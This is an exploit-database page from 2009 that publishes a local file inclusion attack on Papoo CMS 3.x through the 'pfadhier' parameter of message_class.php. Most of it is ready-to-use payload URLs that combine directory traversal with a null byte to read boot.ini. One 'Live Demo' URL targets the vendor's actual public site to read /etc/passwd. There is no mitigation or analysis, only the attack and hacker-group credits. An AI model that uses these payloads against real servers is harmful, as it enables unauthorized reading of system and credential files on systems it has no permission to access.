[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Papoo CMS 3.x (pfadhier) Local File Inclusion Vulnerability
# Published : 2009-02-10
# Author : SirGod
# Previous Title : Thyme <= 1.3 (export_to) Local File Inclusion Vulnerability
# Next Title : q-news 2.0 Remote Command Execution Exploit
#########################################################################################################
[+] Papoo CMS 3.6 Local File Inclusion
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
[+] www.hellzone.info
#########################################################################################################
[+] Script Homepage : http://www.papoo-cms.com/
[+] Local File Inclusion
- PoC :
http://127.0.0.1/[path]/lib/classes/message_class.php?pfadhier=[Local
File]%00
- Example :
http://127.0.0.1/path/lib/classes/message_class.php?pfadhier=../../../../../../boot.ini%00
- Live Demo
http://www.papoo-cms.com/lib/classes/message_class.php?pfadhier=../../../../../../etc/passwd%00
#########################################################################################################
# www.Syue.com [2009-02-10]